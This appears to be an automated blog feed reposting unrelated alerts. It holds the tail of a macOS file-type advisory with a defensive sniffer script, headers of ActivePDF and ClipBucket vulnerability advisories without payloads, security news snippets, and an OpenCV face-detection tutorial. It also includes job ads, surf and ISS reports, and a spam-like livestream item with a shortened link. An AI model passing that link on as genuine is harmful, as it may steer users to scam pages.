- GData – pending
- MacKeeper – no response
- McAfee – no response
- Panda – no response
- QuikAV – pending
- Total Defense – pending

REFERENCES

Apple Product Security Followup Numbers: 638059697, 640528823 and 640528841
Cisco Ref # PSIRT-1814664974

CREDITS

Advisory written by Yakov Shafranovich.
TIMELINE SUMMARY 2016-03-21: Report # 638059697 submitted 2016-05-04: Reports # 640528823 and 640528841 submitted 2016-05-21: Report # 640528823 rejected 2016-06-22: Report # 638059697 rejected 2016-06-23: Report # 640528841 rejected 2017-03-15: Advisory provided to the vendor for comment 2017-04-23: Retested on macOS Sierra, updated and resent to vendor for comment 2017-04-28: Reply from vendor received 2017-05-01: Retested on a fresh install of macOS Sierra, revised advisory sent to vendor for comment 2017-05-01: Notifications go out to AV vendors 2018-01-24: Second time that notifications go out to AV vendors 2018-02-10: Third and final time that notifications go out to AV vendors 2018-02-10: Final advisory shared with the vendor (Apple) for comment 2018-02-25: Public disclosure
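
The advisory's recommendation that scanners account for one format being renamed as another can be implemented by identifying the container from its content and comparing that with the extension. The sketch below is an added example, not code from the advisory: the function names and sample files are constructed, the magic values are standard format facts (ZIP "PK" signatures, the xar header used by flat installer packages, the UDIF "koly" trailer), and the alias lists are the extensions the advisory reports.

```python
import io
import os
import zipfile

# Magic values (format facts, not taken from the advisory).
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")
XAR_MAGIC = b"xar!"    # flat installer packages are xar archives
UDIF_MAGIC = b"koly"   # UDIF disk images end with a 512-byte "koly" trailer

# Extension each container normally carries.
CANONICAL_EXT = {"zip": "zip", "udif": "dmg", "xar": "pkg"}

# Alternate extensions the advisory reports macOS opening after a rename.
ADVISORY_ALIASES = {
    "zip": {"as", "cpgz", "pax", "xip"},
    "udif": {"cdr", "dart", "dc42", "diskcopy42", "dmgpart", "dvdr", "img",
             "imgpart", "iso", "ndif", "smi", "sparsebundle", "sparseimage",
             "toast", "udif"},
    "xar": {"mpkg"},
}


def sniff(data):
    """Return 'zip', 'xar', 'udif' or None, judging by content alone."""
    if data[:4] in ZIP_MAGICS:
        return "zip"
    if data[:4] == XAR_MAGIC:
        return "xar"
    # Images without a UDIF trailer (raw images, real ISO 9660) are not matched.
    if len(data) >= 512 and data[-512:-508] == UDIF_MAGIC:
        return "udif"
    return None


def check(name, data):
    """Compare the sniffed container type with the file extension.

    Returns None when they agree or the content is not a known container;
    otherwise a finding telling the scanner to unpack by content type.
    """
    kind = sniff(data)
    if kind is None:
        return None
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    if ext == CANONICAL_EXT[kind]:
        return None
    return {
        "file": name,
        "content": kind,
        "extension": ext,
        # True when the extension is one macOS will still open (per advisory)
        "advisory_alias": ext in ADVISORY_ALIASES[kind],
    }


def make_samples():
    """Constructed in-memory samples; nothing here is a real disk image."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed sample content")
    zip_bytes = buf.getvalue()
    udif_bytes = b"\x00" * 1024 + UDIF_MAGIC + b"\x00" * 508
    xar_bytes = XAR_MAGIC + b"\x00" * 24
    return {
        "invoice.zip": zip_bytes,   # extension matches content
        "invoice.pax": zip_bytes,   # ZIP renamed to an advisory alias
        "photo.jpg": zip_bytes,     # ZIP under an unrelated extension
        "backup.iso": udif_bytes,   # UDIF image renamed as .iso
        "setup.mpkg": xar_bytes,    # flat package renamed as .mpkg
        "notes.txt": b"plain text",
    }


def scan(samples):
    """Return findings for every sample whose extension hides its container."""
    results = (check(name, data) for name, data in sorted(samples.items()))
    return [finding for finding in results if finding]


if __name__ == "__main__":
    for finding in scan(make_samples()):
        print(finding)
```

A scanner would route every finding to the unpacker for the reported content type, and treat advisory_alias as the higher-priority case because the advisory reports that macOS still opens those files on double click.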

Source: Gmail -> IFTTT-> Blogger

[FD] ActivePDF Toolkit < 8.1.0 multiple RCE

ActivePDF Toolkit < 8.1.0 multiple RCE

Introduction
============
The ActivePDF Toolkit is a Windows library which enhances business processes to stamp, stitch, merge, form-fill, add digital signatures, barcodes to PDF. Both .NET and native APIs are provided. Amongst many other operations, this library can be used by applications to transform images to PDF files.

Multiple vulnerabilities were identified in the Pictview image processing library embedded by the Toolkit and signed by ActivePDF. They could allow remote attackers to compromise applications relying on the Toolkit to process untrusted images.

Note that, while the example instances hereafter use “exotic” file types, the parser determines the image type from magic bytes, ignoring file extensions in most cases.

CVE
===
CVE-2018-7264

Affected versions
=================
ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)

Author
======
François Goichon - Google Security Team

CVE-2018-7264
=============
ActivePDF Toolkit < 8.1.0.19023 multiple RCE

Summary

Source: Gmail -> IFTTT-> Blogger

Security Analyst

View details and apply for this security analyst job in East London (E1W) with Anonymous on CWJobs. Security Analyst : Global FTSE 250 Company Our FTSE 250 market leading company, has an exciting opportunity for a Security Analyst to join their Information Technology department in London.

from Google Alert - anonymous http://ift.tt/2CoELUq
via IFTTT

ISS Daily Summary Report – 2/26/2018

52Soyuz Landing Preparations:  Crew and ground teams continued to prepare for tomorrow’s planned 52S Undock and landing.  52S is scheduled to undock tomorrow at 5:09 PM CST with landing at 8:31 PM CST.  Today’s activities included packing 52S with return cargo, Emergency Roles and Responsibilities Review, and Change of Command Ceremony.  Lighting Effects: Upon wake … Continue reading "ISS Daily Summary Report – 2/26/2018"

from ISS On-Orbit Status Report http://ift.tt/2HP8J3i
via IFTTT

I have a new follower on Twitter


Mark Bland
▪️ Host of @theqnow ▪️Music Exec w/ a couple plaques▪️Former Pro Wrestler ▪️ #Stl Native 💯▪️.262 batting average in softball https://t.co/Tvkw8CsV8O
St Louis, MO/World Wide
https://t.co/xIuwPorgDD
Following: 16676 - Followers: 87837

February 27, 2018 at 10:07AM via Twitter http://twitter.com/markbland

Hacker Who Never Hacked Anyone Gets 33-Month Prison Sentence

A hacker who was arrested and pleaded guilty last year—not because he hacked someone, but for creating and selling a remote access trojan that helped cyber criminals—has finally been sentenced to serve almost three years in prison. Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty in July 2017 to one charge of aiding and abetting computer intrusions by building and intentionally


from The Hacker News http://ift.tt/2F5PeVD
via IFTTT

mlp/ - Magicless Anonymous #28

Magicless Anonymous #28 - "/mlp/ - Pony" is 4chan's imageboard dedicated to the discussion of My Little Pony: Friendship is Magic.

from Google Alert - anonymous http://ift.tt/2HRBkoG
via IFTTT

8th St.'s surf is at least 9.54ft high

Maryland-Delaware, March 05, 2018 at 02:00AM

8th St. Summary
At 2:00 AM, surf min of 9.54ft. At 8:00 AM, surf min of 9.59ft. At 2:00 PM, surf min of 9.54ft. At 8:00 PM, surf min of 9.35ft.

Surf maximum: 11.39ft (3.47m)
Surf minimum: 9.54ft (2.91m)
Tide height: 0.32ft (0.1m)
Wind direction: NNE
Wind speed: 7.29 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket

SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
              title: OS command injection, arbitrary file upload & SQL injection
            product: ClipBucket
 vulnerable version: <4.0.0 - Release 4902
      fixed version: 4.0.0 - Release 4902
         CVE number: -
             impact: critical
           homepage: http://clipbucket.com/
              found: 2017-09-06
                 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
                     Wan Ikram (Office Kuala Lumpur)
                     Fikri Fadzil (Office Kuala Lumpur)
                     Jasveer Singh (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal
                     Moscow - Munich - Kuala Lumpur - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:

Source: Gmail -> IFTTT-> Blogger

AKG Anonymous Beethoven Painting c1910 t

top/womens-vintage-shoes-c-67_68_87_88_482_483/chaussures-escarpins-cuir-daim-noir-t-37-miss-roberta-talons-p-390. top/las-vegas-nv-nevada-street-scene-vintage-hand-painted-china-shoe-nico-japan-p-371. 4050155396295, Kunst für Alle Kunstreproduktion: AKG Anonymous, Bettina von ...

from Google Alert - anonymous http://ift.tt/2FBH6Ks
via IFTTT

Any anonymous claiming of UBTC offers out there BitcoinAirdrops

Any anonymous claiming of UBTC offers out there BitcoinAirdrops. You will have to use private keys by sweeping them you will be able to claim once it will be ready at the end of this month. Please avoid repetition — /r/BitcoinAirdrops is a subreddit devoted to new information and discussion about ...

from Google Alert - anonymous http://ift.tt/2EWPanJ
via IFTTT

Looking for a way to post anonymously

It did not take long to hear from a YouTube spokesperson who wanted to make it clear that the, "change won't affect your ability to choose []3 Feb 2015 The easiest way to track down the company behind an anonymous job posting is to do a search for a piece of the job description. An anonymous post is ...

from Google Alert - anonymous http://ift.tt/2Fz3CDw
via IFTTT

Can't disable google maps file loading

Bh @ js?key=:98 Google Maps API warning: NoApiKeys http://ift.tt/1Lj5JMz fC.j @ util.js:237 (anonymous) @ js?key=:146 (anonymous) @ js?key=:62 (anonymous) @ js?key=:60 (anonymous) @ js?key=:62 (anonymous) ...

from Google Alert - anonymous http://ift.tt/2EU3eT0
via IFTTT

Phone-Cracking Firm Found a Way to Unlock Any iPhone Model

Remember the infamous encryption fight between Apple and the FBI for unlocking an iPhone belonging to a terrorist behind the San Bernardino mass shooting that took place two years ago? After Apple refused to help the feds access data on the locked iPhone, the FBI eventually paid over a million dollar to a third-party company for unlocking the shooter's iPhone 5c. Now, it appears that the


from The Hacker News http://ift.tt/2CKQXun
via IFTTT

Monday, February 26, 2018

Customizing the anonymous welcome page

Customizing the anonymous welcome page. Last updated on. 26 February 2018. As an administrator, you can make changes to most of your Drupal Commons website by clicking an entity's gear menu and editing its values. Unfortunately, you cannot use this method with the welcome page displayed ...

from Google Alert - anonymous http://ift.tt/2CJteKY
via IFTTT

large crowd of anonymous blurred people at a trade show hall

large crowd of anonymous blurred people at a trade show hall - Buy this stock photo and explore similar images at Adobe Stock.

from Google Alert - anonymous http://ift.tt/2Co56Sw
via IFTTT

San Benito High School Anonymous Tip Line

San Benito High School Anonymous Tip Line. 831-637-5831 x403. Get in Touch. Contáctenos. 1220 Monterey Street Hollister, CA 95023 831-637-5831. Non-Discrimination Statement · Declaración Contra la Discriminación. © 2018 San Benito High School District. All Rights Reserved.

from Google Alert - anonymous http://ift.tt/2oyqx9X
via IFTTT

Orioles P Kevin Gausman leaves Monday's game vs. Tigers after collision at home plate (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Chauffeur in Worthing (BN14) | Anonymous

View details and apply for this chauffeur job in Worthing (BN14) with Anonymous on totaljobs. Chauffeur to drive company director's vehicle.

from Google Alert - anonymous http://ift.tt/2orHsfa
via IFTTT

Assistant general manager

View details and apply for this assistant general manager job in Brighton (BN1) with Anonymous Recruiter on Caterer.com. Assistant Restaurant / Bar General Manager We are looking for a keen, motivated, and experienced Assistant Restaurant / Bar General Manager to undertake the management of ...

from Google Alert - anonymous http://ift.tt/2ovtmbQ
via IFTTT

fusion360-anonymous on Sketchfab - Sketchfab

fusion360-anonymous - See fusion360-anonymous profile and 3D models on Sketchfab.

from Google Alert - anonymous http://ift.tt/2osFOd4
via IFTTT

Offseason QB Confidence Index: How the Ravens feel about their depth chart (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely

If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible. Google's security researcher at Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and newly launched 'μTorrent Web' that allows users to download and stream torrents


from The Hacker News http://ift.tt/2F6ZaOp
via IFTTT

Face detection with OpenCV and deep learning

Today I’m going to share a little known secret with you regarding the OpenCV library:

You can perform fast, accurate face detection with OpenCV using a pre-trained deep learning face detector model shipped with the library.

You may already know that OpenCV ships out-of-the-box with pre-trained Haar cascades that can be used for face detection…

…but I’m willing to bet that you don’t know about the “hidden” deep learning-based face detector that has been part of OpenCV since OpenCV 3.3.

In the remainder of today’s blog post I’ll discuss:

  • Where this “hidden” deep learning face detector lives in the OpenCV library
  • How you can perform face detection in images using OpenCV and deep learning
  • How you can perform face detection in video using OpenCV and deep learning

As we’ll see, it’s easy to swap out Haar cascades for their more accurate deep learning face detector counterparts.

To learn more about face detection with OpenCV and deep learning, just keep reading!

Looking for the source code to this post?
Jump right to the downloads section.

Face detection with OpenCV and deep learning

Today’s blog post is broken down into three parts.

In the first part we’ll discuss the origin of the more accurate OpenCV face detectors and where they live inside the OpenCV library.

From there I’ll demonstrate how you can perform face detection in images using OpenCV and deep learning.

I’ll then wrap up the blog post discussing how you can apply face detection to video streams using OpenCV and deep learning as well.

Where do these “better” face detectors live in OpenCV and where did they come from?

Back in August 2017, OpenCV 3.3 was officially released, bringing with it a highly improved “deep neural networks” (dnn) module.

This module supports a number of deep learning frameworks, including Caffe, TensorFlow, and Torch/PyTorch.

The primary contributor to the dnn module, Aleksandr Rybnikov, has put a huge amount of work into making this module possible (and we owe him a big round of thanks and applause).

And since the release of OpenCV 3.3, I’ve been sharing a number of deep learning OpenCV tutorials, including:

However, what most OpenCV users do not know is that Rybnikov has included a more accurate, deep learning-based face detector in the official release of OpenCV (although it can be a bit hard to find if you don’t know where to look).

The Caffe-based face detector can be found in the face_detector sub-directory of the dnn samples:

Figure 1: The OpenCV repository on GitHub has an example of deep learning face detection.

When using OpenCV’s deep neural network module with Caffe models, you’ll need two sets of files:

  • The .prototxt file(s) which define the model architecture (i.e., the layers themselves)
  • The .caffemodel file which contains the weights for the actual layers

Both files are required when using models trained using Caffe for deep learning.

However, you’ll only find the prototxt files here in the GitHub repo.

The weight files are not included in the OpenCV samples directory and it requires a bit more digging to find them…

Where can I get the more accurate OpenCV face detectors?

For your convenience, I have included both the:

  1. Caffe prototxt files
  2. and Caffe model weight files

…inside the “Downloads” section of this blog post.

To skip to the downloads section, just click here.

How does the OpenCV deep learning face detector work?

Figure 2: Deep Learning with OpenCV’s DNN module.

OpenCV’s deep learning face detector is based on the Single Shot Detector (SSD) framework with a ResNet base network (unlike other OpenCV SSDs that you may have seen which typically use MobileNet as the base network).

A full review of SSDs and ResNet is outside the scope of this blog post, so if you’re interested in learning more about Single Shot Detectors (including how to train your own custom deep learning object detectors), start with this article here on the PyImageSearch blog and then take a look at my book, Deep Learning for Computer Vision with Python, which includes in-depth discussions and code enabling you to train your own object detectors.

Face detection in images with OpenCV and deep learning

In this first example we’ll learn how to apply face detection with OpenCV to single input images.

In the next section we’ll learn how to modify this code and apply face detection with OpenCV to videos, video streams, and webcams.

Open up a new file, name it detect_faces.py, and insert the following code:
# import the necessary packages
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
ap.add_argument("-p", "--prototxt", required=True,
        help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
        help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
        help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

Here we are importing our required packages (Lines 2-4) and parsing command line arguments (Lines 7-16).

We have three required arguments:

  • --image: The path to the input image.
  • --prototxt: The path to the Caffe prototxt file.
  • --model: The path to the pretrained Caffe model.

An optional argument, --confidence, can overwrite the default threshold of 0.5 if you wish.

From there let’s load our model and create a blob from our image:

# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])

# load the input image and construct an input blob for the image
# by resizing to a fixed 300x300 pixels and then normalizing it
image = cv2.imread(args["image"])
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
        (300, 300), (104.0, 177.0, 123.0))

First, we load our model using our --prototxt and --model file paths. We store the model as net (Line 20).

Then we load the image (Line 24), extract the dimensions (Line 25), and create a blob (Lines 26 and 27).

The dnn.blobFromImage function takes care of pre-processing, which includes setting the blob dimensions and normalization. If you’re interested in learning more about the dnn.blobFromImage function, I review it in detail in this blog post.

Next, we’ll apply face detection:

# pass the blob through the network and obtain the detections and
# predictions
print("[INFO] computing object detections...")
net.setInput(blob)
detections = net.forward()

To detect faces, we pass the blob through the net on Lines 32 and 33.

And from there we’ll loop over the detections and draw boxes around the detected faces:
# loop over the detections
for i in range(0, detections.shape[2]):
        # extract the confidence (i.e., probability) associated with the
        # prediction
        confidence = detections[0, 0, i, 2]

        # filter out weak detections by ensuring the `confidence` is
        # greater than the minimum confidence
        if confidence > args["confidence"]:
                # compute the (x, y)-coordinates of the bounding box for the
                # object
                box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
                (startX, startY, endX, endY) = box.astype("int")
 
                # draw the bounding box of the face along with the associated
                # probability
                text = "{:.2f}%".format(confidence * 100)
                y = startY - 10 if startY - 10 > 10 else startY + 10
                cv2.rectangle(image, (startX, startY), (endX, endY),
                        (0, 0, 255), 2)
                cv2.putText(image, text, (startX, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)

# show the output image
cv2.imshow("Output", image)
cv2.waitKey(0)

We begin looping over the detections on Line 36.

From there, we extract the confidence (Line 39) and compare it to the confidence threshold (Line 43). We perform this check to filter out weak detections.

If the confidence meets the minimum threshold, we proceed to draw a rectangle along with the probability of the detection on Lines 46-56.

To accomplish this, we first calculate the (x, y)-coordinates of the bounding box (Lines 46 and 47).

We then build our confidence text string (Line 51) which contains the probability of the detection.

In case our text would go off-image (such as when the face detection occurs at the very top of an image), we shift it down by 10 pixels (Line 52).

Our face rectangle and confidence text are drawn on the image on Lines 53-56.

From there we loop back for additional detections, following the process again. If no detections remain, we’re ready to show our output image on the screen (Lines 59 and 60).
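
How the rows of the detections array map to pixel boxes, as an added example that is not part of the original post: decode_detections is a hypothetical helper and the sample rows are constructed. It goes one step beyond the loop above by clamping boxes to the image, since the network's normalized coordinates can fall outside the 0 to 1 range for faces near the border.

```python
def decode_detections(rows, width, height, min_confidence=0.5):
    """Turn SSD output rows into clamped pixel boxes.

    rows is an N x 7 sequence such as detections[0, 0] from net.forward();
    each row is [image_id, class_id, confidence, x1, y1, x2, y2] with the
    four corner coordinates normalized to the input image.
    """
    faces = []
    for row in rows:
        confidence = float(row[2])
        if confidence < min_confidence:
            continue  # weak detection, same filter as the post's loop

        # scale the normalized corners to pixels (truncating, like
        # box.astype("int") in the post)
        x1 = int(float(row[3]) * width)
        y1 = int(float(row[4]) * height)
        x2 = int(float(row[5]) * width)
        y2 = int(float(row[6]) * height)

        # clamp to the image so drawing or cropping never leaves the frame
        x1 = min(max(x1, 0), width - 1)
        y1 = min(max(y1, 0), height - 1)
        x2 = min(max(x2, 0), width - 1)
        y2 = min(max(y2, 0), height - 1)

        # a box that collapsed after clamping lay wholly outside the image
        if x2 <= x1 or y2 <= y1:
            continue
        faces.append((x1, y1, x2, y2, confidence))
    return faces


# Constructed rows in the network's output layout (not real model output).
SAMPLE_ROWS = [
    [0, 1, 0.99, 0.25, 0.125, 0.5, 0.5],     # box fully inside the image
    [0, 1, 0.75, -0.125, 0.5, 0.25, 1.25],   # spills past left and bottom
    [0, 1, 0.25, 0.5, 0.5, 0.75, 0.75],      # below the default threshold
    [0, 1, 0.875, 1.25, 1.25, 1.5, 1.5],     # wholly outside the image
]

if __name__ == "__main__":
    for face in decode_detections(SAMPLE_ROWS, width=400, height=300):
        print(face)
```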

Face detection in images with OpenCV results

Let’s try out the OpenCV deep learning face detector.

Make sure you use the “Downloads” section of this blog post to download:

  • The source code used in this blog post
  • The Caffe prototxt files for deep learning face detection
  • The Caffe weight files used for deep learning face detection
  • The example images used in this post

From there, open up a terminal and execute the following command:

$ python detect_faces.py --image rooster.jpg --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 3: My face is detected in this image with 74% confidence using the OpenCV deep learning face detector.

The above photo is of me during my first trip to Ybor City in Florida, where chickens are allowed to roam free throughout the city. There are even laws protecting the chickens which I thought was very cool. Even though I grew up in rural farmland, I was still totally surprised to see a rooster crossing the road — which of course spawned many “Why did the chicken cross the road?” jokes.

Here you can see my face is detected with 74.30% confidence, even though my face is at an angle. OpenCV’s Haar cascades are notorious for missing faces that are not at a “straight on” angle, but by using OpenCV’s deep learning face detectors, we are able to detect my face.

And now we’ll see how another example works, this time with three faces:

$ python detect_faces.py --image iron_chic.jpg --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 4: The OpenCV DNN face detector finds all three faces without any trouble.

 

This photo was taken in Gainesville, FL after one of my favorite bands finished up a show at Loosey’s, a popular bar and music venue in the area. Here you can see my fiance (left), me (middle), and Jason (right), a member of the band.

I’m incredibly impressed that OpenCV can detect Trisha’s face, despite the lighting conditions and shadows cast on her face in the dark venue (and with 86.81% probability!)

Again, this just goes to show how much better (in terms of accuracy) the deep learning OpenCV face detectors are over their standard Haar cascade counterparts shipped with the library.

Face detection in video and webcam with OpenCV and deep learning

Now that we have learned how to apply face detection with OpenCV to single images, let’s also apply face detection to videos, video streams, and webcams.

Luckily for us, most of our code in the previous section on face detection with OpenCV in single images can be reused here!

Open up a new file, name it detect_faces_video.py, and insert the following code:
# import the necessary packages
from imutils.video import VideoStream
import numpy as np
import argparse
import imutils
import time
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=True,
        help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
        help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
        help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

Compared to above, we will need to import three additional packages: VideoStream, imutils, and time.

If you don’t have imutils in your virtual environment, you can install it via:
$ pip install imutils

Our command line arguments are mostly the same, except we do not have an --image path argument this time. We’ll be using our webcam’s video feed instead.

From there we’ll load our model and initialize the video stream:

# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])

# initialize the video stream and allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)

Loading the model is the same as above.

We initialize a VideoStream object specifying the camera with index zero as the source (in general this would be your laptop’s built-in camera or your desktop’s first camera detected).

A few quick notes here:

  • Raspberry Pi + picamera users can replace Line 25 with vs = VideoStream(usePiCamera=True).start() if you wish to use the Raspberry Pi camera module.
  • If you want to parse a video file (rather than a video stream) swap out the VideoStream class for FileVideoStream. You can learn more about the FileVideoStream class in this blog post.

We then allow the camera sensor to warm up for 2 seconds (Line 26).

From there we loop over the frames and compute face detections with OpenCV:

# loop over the frames from the video stream
while True:
        # grab the frame from the threaded video stream and resize it
        # to have a maximum width of 400 pixels
        frame = vs.read()
        frame = imutils.resize(frame, width=400)
 
        # grab the frame dimensions and convert it to a blob
        (h, w) = frame.shape[:2]
        blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,
                (300, 300), (104.0, 177.0, 123.0))
 
        # pass the blob through the network and obtain the detections and
        # predictions
        net.setInput(blob)
        detections = net.forward()

This block should look mostly familiar to the static image version in the previous section.

In this block, we’re reading a frame from the video stream (Line 32), creating a blob (Lines 37 and 38), and passing the blob through the deep neural net to obtain face detections (Lines 42 and 43).

We can now loop over the detections, compare to the confidence threshold, and draw face boxes + confidence values on the screen:

        # loop over the detections
        for i in range(0, detections.shape[2]):
                # extract the confidence (i.e., probability) associated with the
                # prediction
                confidence = detections[0, 0, i, 2]

                # filter out weak detections by ensuring the `confidence` is
                # greater than the minimum confidence
                if confidence < args["confidence"]:
                        continue

                # compute the (x, y)-coordinates of the bounding box for the
                # object
                box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
                (startX, startY, endX, endY) = box.astype("int")
 
                # draw the bounding box of the face along with the associated
                # probability
                text = "{:.2f}%".format(confidence * 100)
                y = startY - 10 if startY - 10 > 10 else startY + 10
                cv2.rectangle(frame, (startX, startY), (endX, endY),
                        (0, 0, 255), 2)
                cv2.putText(frame, text, (startX, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)

For a detailed review of this code block, please review the previous section where we perform face detection on still, static images. The code here is nearly identical.

Now that our OpenCV face detections have been drawn, let’s display the frame on the screen and wait for a keypress:

        # show the output frame
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
 
        # if the `q` key was pressed, break from the loop
        if key == ord("q"):
                break

# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()

We display the frame on the screen until the “q” key is pressed, at which point we break out of the loop and perform cleanup.

Face detection in video and webcam with OpenCV results

To try out the OpenCV deep learning face detector make sure you use the “Downloads” section of this blog post to grab:

  • The source code used in this blog post
  • The Caffe prototxt files for deep learning face detection
  • The Caffe weight files used for deep learning face detection

Once you have downloaded the files, running the deep learning OpenCV face detector with a webcam feed is easy with this simple command:

$ python detect_faces_video.py --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 5: Face detection in video with OpenCV’s DNN module.

You can see a full video demonstration, including my commentary, in the following video:

Summary

In today’s blog post you discovered a little known secret about the OpenCV library — OpenCV ships out-of-the-box with a more accurate face detector (as compared to OpenCV’s Haar cascades).

The more accurate OpenCV face detector is deep learning based, and in particular, utilizes the Single Shot Detector (SSD) framework with ResNet as the base network.

Thanks to the hard work of Aleksandr Rybnikov and the other contributors to OpenCV’s

dnn
  module, we can enjoy these more accurate OpenCV face detectors in our own applications.

The deep learning face detectors can be hard to find in the OpenCV library, so for your convenience, I have gathered the Caffe prototxt and weight files for you — just use the “Downloads” form below to download the (more accurate) deep learning-based OpenCV face detector.

See you next week with another great computer vision + deep learning tutorial!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post Face detection with OpenCV and deep learning appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2CnHc9G
via IFTTT

Will anonymous external sharing be disabled: New ways to govern access of external users

Hello, we just received the Major Update Notification: New ways to govern access of external users are coming to Office 365. When I read the accompanied KB I conclude that external anonymous sharing will not work anymore after this date. And that when using Office365 groups in collaboration with ...

from Google Alert - anonymous http://ift.tt/2CJ5u9M
via IFTTT

ISS Daily Summary Report – 2/23/2018

Lighting Effects: Upon wakeup, the 53S subject provided a sleep log entry and conducted a series of three Cognition tests and provided urine samples over a 24-hour period. The samples will be stowed in the MELFI for freezing until their return and analysis. The Lighting Effects investigation studies the impact of the change from fluorescent … Continue reading "ISS Daily Summary Report – 2/23/2018"

from ISS On-Orbit Status Report http://ift.tt/2CJ99Eu
via IFTTT

8th St.'s surf is at least 9.04ft high

Maryland-Delaware, March 04, 2018 at 02:00AM

8th St. Summary
At 2:00 AM, surf min of 9.04ft. At 8:00 AM, surf min of 9.36ft. At 2:00 PM, surf min of 9.41ft. At 8:00 PM, surf min of 9.43ft.

Surf maximum: 10.8ft (3.29m)
Surf minimum: 9.04ft (2.75m)
Tide height: -0.52ft (-0.16m)
Wind direction: N
Wind speed: 11.35 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

nodebb-plugin-anonymous

Anonymous Plugin for NodeBB. how? learn more · fengxingwei published just now; 0.0.1 is the latest release; github.com/whenjs/nodebb-plugin-anonymous · MIT ...

from Google Alert - anonymous http://ift.tt/2CHW4LQ
via IFTTT

Android P Will Block Background Apps from Accessing Your Camera, Microphone

Yes, your smartphone is spying on you. But, the real question is, should you care? We have published thousands of articles on The Hacker News, warning how any mobile app can turn your smartphone into a bugging device—'Facebook is listening to your conversations', 'Stealing Passwords Using SmartPhone Sensors', 'Your Headphones Can Spy On You' and 'Android Malware Found Spying Military


from The Hacker News http://ift.tt/2BOZfEC
via IFTTT

Passing Jupiter


Here comes Jupiter! NASA's robotic spacecraft Juno is continuing on its 53-day, highly-elongated orbits around our Solar System's largest planet. The featured video is from perijove 11, the eleventh time Juno has passed near Jupiter since it arrived in mid-2016. This time-lapse, color-enhanced movie covers about four hours and morphs between 36 JunoCam images. The video begins with Jupiter rising as Juno approaches from the north. As Juno reaches its closest view -- from about 3,500 kilometers over Jupiter's cloud tops -- the spacecraft captures the great planet in tremendous detail. Juno passes light zones and dark belts of clouds that circle the planet, as well as numerous swirling circular storms, many of which are larger than hurricanes on Earth. After the perijove, Jupiter recedes into the distance, now displaying the unusual clouds that appear over Jupiter's south. To get desired science data, Juno swoops so close to Jupiter that its instruments may soon fail due to exposure to high levels of radiation. Because of this, in part, the Juno mission is currently scheduled to conclude in mid-2018, at perijove 14, when the spacecraft will be directed to dive into Jupiter's atmosphere and melt. via NASA http://ift.tt/2FvQzTt

Sunday, February 25, 2018

Orioles and 1B/DH Pedro Alvarez agree to minor league contract - multiple reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

philadelphia76ersvswashingtonlivestream

philadelphia76ersvswashingtonlivestream. Watch Live>>> http://bit.ly/2ESKYp1. first time all season, the San Antonio Spurs are showing signs of wavering. ... As for their opponent, the Cleveland Cavaliers are looking to bounce back after suffering their first defeat since revamping the first time all season ...

from Google Alert - anonymous http://ift.tt/2BPTUwK
via IFTTT

Toby K. (Unity Day, 2018)

